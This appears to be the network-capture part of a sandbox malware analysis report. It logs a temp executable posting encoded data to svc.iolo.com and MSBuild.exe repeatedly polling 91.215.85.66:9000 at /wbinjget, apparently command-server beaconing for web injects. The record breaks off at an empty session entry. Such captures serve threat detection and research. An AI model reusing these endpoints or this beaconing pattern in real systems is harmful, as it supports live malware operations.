Apr 27, 2024 00:46:10.328342915 CEST	1289	IN	Data Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
Apr 27, 2024 00:46:10.328382015 CEST	1289	IN	Data Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
Apr 27, 2024 00:46:10.328418970 CEST	1289	IN	Data Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65 Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
Apr 27, 2024 00:46:10.328454971 CEST	1289	IN	Data Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
Apr 27, 2024 00:46:10.328494072 CEST	1289	IN	Data Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00 Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
Apr 27, 2024 00:46:10.328530073 CEST	1289	IN	Data Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10 Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
Apr 27, 2024 00:46:10.328567028 CEST	1289	IN	Data Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00 Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
Apr 27, 2024 00:46:10.328603029 CEST	1289	IN	Data Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00 Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
Apr 27, 2024 00:46:10.498959064 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65 Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	20.157.87.45	80	7280	C:\Users\user\AppData\Local\Temp\u5c4.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:17.124367952 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 00:46:17.319202900 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 27, 2024 00:46:17.685653925 CEST	469	IN	HTTP/1.1 200 OK cache-control: private content-length: 256 content-type: text/html; charset=utf-8 x-whom: Ioloweb9 date: Fri, 26 Apr 2024 22:46:16 GMT set-cookie: SERVERID=svc9; path=/ connection: close Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32 Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49754	20.157.87.45	80	7280	C:\Users\user\AppData\Local\Temp\u5c4.3.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:41.483211994 CEST	266	OUT	POST /__svc/sbv/DownloadManager.ashx HTTP/1.0 Connection: keep-alive Content-Length: 300 Host: svc.iolo.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library)
Apr 27, 2024 00:46:41.679469109 CEST	300	OUT	Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
Apr 27, 2024 00:46:41.864085913 CEST	405	IN	HTTP/1.1 200 OK cache-control: private content-length: 192 content-type: text/html; charset=utf-8 x-whom: Ioloweb7 date: Fri, 26 Apr 2024 22:46:41 GMT set-cookie: SERVERID=svc7; path=/ connection: close Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53 Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:48.492965937 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:48.706078053 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49757	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:49.064018965 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:49.274662971 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:51.213428974 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:46:51.426434040 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:50 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:51.873521090 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:52.085535049 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49760	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:52.411780119 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:52.926702023 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49761	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:53.248898983 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:53.460464001 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49762	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:53.776648045 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:53.981132984 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:53 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:54.294573069 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:54.507404089 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:54 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49764	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:55.927722931 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:46:56.139456034 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:55 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49765	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:56.497805119 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:56.711244106 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49766	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:57.036967993 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:57.254137993 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:56 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49767	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:57.576927900 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:57.785945892 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49768	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:58.101372957 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:58.307406902 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:57 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49769	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:58.626198053 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:46:58.837264061 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:58 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49770	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:46:59.627773046 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:46:59.838129044 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:46:59 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49771	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:00.654841900 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:00.865473986 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49772	91.215.85.66	9000

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:01.438038111 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:01.642198086 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49773	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:01.966347933 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:02.171782017 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:01 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:02.488965034 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:02.695054054 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:02 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49777	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:03.010864019 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:03.223088026 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:02 GMT
Apr 27, 2024 00:47:03.740705013 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:02 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49778	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:03.539809942 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:03.742064953 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:03 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49779	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
